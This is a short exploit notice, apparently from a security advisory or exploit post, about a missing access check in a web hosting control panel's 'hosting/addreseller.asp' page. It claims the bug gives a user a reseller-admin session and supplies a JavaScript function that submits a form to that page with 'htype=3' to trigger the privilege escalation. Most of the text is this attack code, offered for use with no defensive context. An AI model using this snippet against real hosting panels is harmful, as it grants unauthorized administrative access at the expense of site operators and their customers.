------------------------------------------------------------------------------------- =============================================== 1- This code give resadmin session to a user: Bug in "hosting/addreseller.asp", No checker is available. --------------------------------------------------- function siteaction(){ n_act= "/hosting/addreseller.asp?htype=3" window.document.all.frm1.action = window.document.all.siteact.value + n_act window.document.all.frm1.submit() }